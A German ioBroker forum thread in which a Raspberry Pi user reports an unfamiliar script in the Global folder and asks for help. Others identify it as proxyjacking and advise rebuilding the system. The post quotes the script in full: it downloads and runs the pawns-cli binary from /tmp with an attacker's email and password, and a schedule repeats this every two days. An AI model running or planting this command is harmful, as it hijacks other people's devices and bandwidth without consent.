[gelöst]Seltsames Script unter Global

chemieka

Hallo
Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
Wenn ich mir das anschauen, denke ich mir da ist was faul.
Der Inhalt wäre folgendes:

exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
schedule("10 6 */2 * *", async function () {
  exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
});

Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.

DJMarc75

@chemieka sagte in Seltsames Script unter Global:

Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme

Und wir bewegen uns bei Dir auf was für einem System ? Windows ?

chemieka

Das ist eine PI4. Normale Installation von IOBroker laut hier:
https://forum.iobroker.net/topic/51869/installation-auf-raspi-einfacher-geht-s-nicht

Das Script ist nur zu finden wenn Expert Aktiviert ist, sonst ist der Ordner Global nicht zu sehen.

Das System ist neu aufgesetzt und dann das Backup eingespielt. Zwei Tage alt.

Da steckt wohl das hier dahinter: https://pawns.app/
Möchte meinen da wollte oder hat sich jemand meine PI4 leihen wollen.
Wüsste gern ob es gelungen ist und wenn ja wie ich das runter bekomme.

crunchip

@chemieka Geld verdienen?
https://github.com/IPRoyal/pawns-cli/blob/main/readme.md

chemieka

@crunchip
Na das hatte ich auch gefunden. Aber sicher nicht selber drauf gemacht. Das System ist ja nur zwei Tage alt. Über das Backup evtl. wieder draufgekommen?

crunchip

@chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte

Portfreigabe für iobroker?

chemieka

@crunchip
Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
Wie könnte ich prüfen ob die Installation durchgeführt wurde?

Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.

Glasfaser

@chemieka sagte in Seltsames Script unter Global:

device-name=xxxxxxxxxx@io

was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX

Hast du eine DynDNS Service

EDIT :

DynDNS von @chemieka unkenntlich gemacht

crunchip

@chemieka ich bin da kein Spezialist für
da steht bisserl Hintergrund info
https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

chemieka

@crunchip
Der Hintergrund ist mir bekannt bzw. schon gelesen.
Könnte man irgendwie erkennen ob die Installation drauf ist? Seltsam ist auch, die Dateien im Tmp sind vom Anfang Juni. Das System aber zwei Tage alt. Hm.
Ich glaube ich mache nochmal eine neue Karte fertig und schau mal dann.

Glasfaser

@glasfaser sagte in Seltsames Script unter Global:

@chemieka sagte in Seltsames Script unter Global:

device-name=chemieka.ddnss.de@io

was auch komisch ist ...das ich auch dein Username ...

Hast du eine DynDNS Service

Was ist hiermit !?

Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

chemieka

@glasfaser
Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

Glasfaser

@chemieka sagte in Seltsames Script unter Global:

Ja das stimmt schon,

Die DynDNS ist von dir selber oder die IP mit der 06 !?

chemieka

@glasfaser
beides.

Glasfaser

@chemieka

Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
Werde Ihn dazu editieren !!

chemieka

@glasfaser
Ja bitte. System mal neu Aufsetzen.

OliverIO

@chemieka
so ein system ist nicht mehr vertrauenswürdig.
wer weiß was da noch so auf dem system drauf ist oder sich
über so eine anwendung mit drauf gepfriemelt hat.

eigentlich bleibt nur noch eins,
alles platt machen
neu aufbauen
ob du dem backup noch vertraust musst du selber überlegen
ich würde es nicht.

Glasfaser

@chemieka sagte in Seltsames Script unter Global:

@glasfaser
beides.

Große Frage ... wie kommt Mister X an deine DynDNS ,
hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

chemieka

@oliverio
So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

OliverIO

@glasfaser

wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
nas/samba-freigabe ohne passwort?
windows ohne passwort?
raspberries mit standard login?
nas mit standard login?
etc.

als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.